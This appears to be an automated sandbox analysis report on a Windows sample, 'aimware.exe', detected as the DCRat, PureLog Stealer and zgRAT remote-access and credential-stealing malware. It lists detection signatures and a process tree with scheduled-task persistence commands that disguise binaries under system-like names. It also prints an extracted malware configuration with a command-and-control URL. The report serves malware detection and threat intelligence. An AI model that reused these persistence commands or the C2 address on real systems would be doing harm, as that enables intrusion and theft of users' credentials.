Edit tour

Windows Analysis Report
aimware.exe

Overview

General Information

Sample name:	aimware.exe
Analysis ID:	1581755
MD5:	09b7a6fd3683f653ea233a547c082671
SHA1:	07f919d59982c0670ea31d1f1f63b08f31eff676
SHA256:	869f0e3329384069c1fad576588672e99686bd57eee2213f90f0c78ece45d7ca
Tags:	exeuser-aachum
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files with benign system names

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

aimware.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\aimware.exe" MD5: 09B7A6FD3683F653EA233A547C082671)

wscript.exe (PID: 7456 cmdline: "C:\Windows\System32\WScript.exe" "C:\webFontsession\ygBm0L4dnhMtPJ5zo9k2Iwhn4.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c ""C:\webFontsession\7uhC6Mx3YQJtIYicktXEMaD7UeOIzINRTf.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SurrogatesessionRuntimeBrokerDhcp.exe (PID: 7616 cmdline: "C:\webFontsession/SurrogatesessionRuntimeBrokerDhcp.exe" MD5: 73E7655A3D54309A3CCFB3B9CA197652)

schtasks.exe (PID: 7712 cmdline: schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7740 cmdline: schtasks.exe /create /tn "wDyQbcxdSUUjszASb" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7764 cmdline: schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

csc.exe (PID: 7780 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7836 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7247.tmp" "c:\Windows\System32\CSCF3A8C87A1D90404F9DF2BA668ED638.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

schtasks.exe (PID: 7860 cmdline: schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\wDyQbcxdSUUjszASb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7884 cmdline: schtasks.exe /create /tn "wDyQbcxdSUUjszASb" /sc ONLOGON /tr "'C:\Program Files (x86)\google\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7908 cmdline: schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7932 cmdline: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Recovery\spoolsv.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7956 cmdline: schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\spoolsv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7980 cmdline: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Recovery\spoolsv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8004 cmdline: schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8028 cmdline: schtasks.exe /create /tn "wDyQbcxdSUUjszASb" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8052 cmdline: schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8076 cmdline: schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8100 cmdline: schtasks.exe /create /tn "wDyQbcxdSUUjszASb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8128 cmdline: schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8152 cmdline: schtasks.exe /create /tn "SurrogatesessionRuntimeBrokerDhcpS" /sc MINUTE /mo 13 /tr "'C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8180 cmdline: schtasks.exe /create /tn "SurrogatesessionRuntimeBrokerDhcp" /sc ONLOGON /tr "'C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7184 cmdline: schtasks.exe /create /tn "SurrogatesessionRuntimeBrokerDhcpS" /sc MINUTE /mo 14 /tr "'C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 2260 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\n17UfJYjYj.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 824 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6680 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

SurrogatesessionRuntimeBrokerDhcp.exe (PID: 7428 cmdline: "C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe" MD5: 73E7655A3D54309A3CCFB3B9CA197652)

spoolsv.exe (PID: 6760 cmdline: C:\Recovery\spoolsv.exe MD5: 73E7655A3D54309A3CCFB3B9CA197652)

spoolsv.exe (PID: 7196 cmdline: C:\Recovery\spoolsv.exe MD5: 73E7655A3D54309A3CCFB3B9CA197652)

wDyQbcxdSUUjszASb.exe (PID: 3844 cmdline: "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe" MD5: 73E7655A3D54309A3CCFB3B9CA197652)

wDyQbcxdSUUjszASb.exe (PID: 3696 cmdline: "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe" MD5: 73E7655A3D54309A3CCFB3B9CA197652)

SurrogatesessionRuntimeBrokerDhcp.exe (PID: 7304 cmdline: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe MD5: 73E7655A3D54309A3CCFB3B9CA197652)

SurrogatesessionRuntimeBrokerDhcp.exe (PID: 7360 cmdline: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe MD5: 73E7655A3D54309A3CCFB3B9CA197652)

wDyQbcxdSUUjszASb.exe (PID: 7556 cmdline: "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe" MD5: 73E7655A3D54309A3CCFB3B9CA197652)

spoolsv.exe (PID: 3104 cmdline: "C:\Recovery\spoolsv.exe" MD5: 73E7655A3D54309A3CCFB3B9CA197652)

SurrogatesessionRuntimeBrokerDhcp.exe (PID: 7760 cmdline: "C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe" MD5: 73E7655A3D54309A3CCFB3B9CA197652)

wDyQbcxdSUUjszASb.exe (PID: 8084 cmdline: "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe" MD5: 73E7655A3D54309A3CCFB3B9CA197652)

spoolsv.exe (PID: 5000 cmdline: "C:\Recovery\spoolsv.exe" MD5: 73E7655A3D54309A3CCFB3B9CA197652)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://stethem.ru/ImageprocessLinuxgeneratorTestdleLocal", "MUTEX": "DCR_MUTEX-5gR1nc49MRQBmCBSoNRy", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
aimware.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
aimware.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\spoolsv.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\spoolsv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\spoolsv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\spoolsv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\spoolsv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\spoolsv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\spoolsv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\spoolsv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
0000001D.00000002.2912163322.0000000003249000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000003.1660085420.0000000007598000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000000.1726770611.0000000000532000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1659465746.0000000006B5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001D.00000002.2912163322.0000000003702000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.2912163322.0000000003562000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000004.00000002.1785396681.0000000012B6C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SurrogatesessionRuntimeBrokerDhcp.exe PID: 7616	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: wDyQbcxdSUUjszASb.exe PID: 3696	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SurrogatesessionRuntimeBrokerDhcp.exe PID: 7428	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.aimware.exe.6ba32f5.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.aimware.exe.6ba32f5.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.aimware.exe.75de2f5.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.aimware.exe.75de2f5.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.aimware.exe.6ba32f5.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.aimware.exe.6ba32f5.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.0.SurrogatesessionRuntimeBrokerDhcp.exe.530000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.0.SurrogatesessionRuntimeBrokerDhcp.exe.530000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.aimware.exe.75de2f5.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.aimware.exe.75de2f5.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, ProcessId: 7616, TargetFilename: C:\Recovery\spoolsv.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\spoolsv.exe, CommandLine: C:\Recovery\spoolsv.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\spoolsv.exe, NewProcessName: C:\Recovery\spoolsv.exe, OriginalFileName: C:\Recovery\spoolsv.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\spoolsv.exe, ProcessId: 6760, ProcessName: spoolsv.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe", EventID: 13, EventType: SetValue, Image: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, ProcessId: 7616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wDyQbcxdSUUjszASb

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe", EventID: 13, EventType: SetValue, Image: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, ProcessId: 7616, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\webFontsession/SurrogatesessionRuntimeBrokerDhcp.exe", ParentImage: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, ParentProcessId: 7616, ParentProcessName: SurrogatesessionRuntimeBrokerDhcp.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline", ProcessId: 7780, ProcessName: csc.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\webFontsession\ygBm0L4dnhMtPJ5zo9k2Iwhn4.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\webFontsession\ygBm0L4dnhMtPJ5zo9k2Iwhn4.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\aimware.exe", ParentImage: C:\Users\user\Desktop\aimware.exe, ParentProcessId: 7412, ParentProcessName: aimware.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\webFontsession\ygBm0L4dnhMtPJ5zo9k2Iwhn4.vbe" , ProcessId: 7456, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, ProcessId: 7616, TargetFilename: C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\webFontsession/SurrogatesessionRuntimeBrokerDhcp.exe", ParentImage: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, ParentProcessId: 7616, ParentProcessName: SurrogatesessionRuntimeBrokerDhcp.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline", ProcessId: 7780, ProcessName: csc.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Recovery\spoolsv.exe'" /f, CommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Recovery\spoolsv.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\webFontsession/SurrogatesessionRuntimeBrokerDhcp.exe", ParentImage: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, ParentProcessId: 7616, ParentProcessName: SurrogatesessionRuntimeBrokerDhcp.exe, ProcessCommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Recovery\spoolsv.exe'" /f, ProcessId: 7932, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T22:18:29.047322+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49731	172.67.132.55	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: aimware.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\BssArfvD.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Recovery\spoolsv.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\HIyZMmJW.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\webFontsession\ygBm0L4dnhMtPJ5zo9k2Iwhn4.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\KbMQbIAl.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\n17UfJYjYj.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\IqrHyRPU.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt

Found malware configuration

Source: 00000004.00000002.1785396681.0000000012B6C000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://stethem.ru/ImageprocessLinuxgeneratorTestdleLocal", "MUTEX": "DCR_MUTEX-5gR1nc49MRQBmCBSoNRy", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Desktop\BssArfvD.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\FRcYkGBu.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\HIyZMmJW.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\IqrHyRPU.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\KbMQbIAl.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\NUmFqbLL.log	ReversingLabs: Detection: 25%

Multi AV Scanner detection for submitted file

Source: aimware.exe	ReversingLabs: Detection: 62%
Source: aimware.exe	Virustotal: Detection: 58%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\ziWzrNQC.log	Joe Sandbox ML: detected
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\EJYQaGiX.log	Joe Sandbox ML: detected
Source: C:\Recovery\spoolsv.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\KbMQbIAl.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\IqrHyRPU.log	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: aimware.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

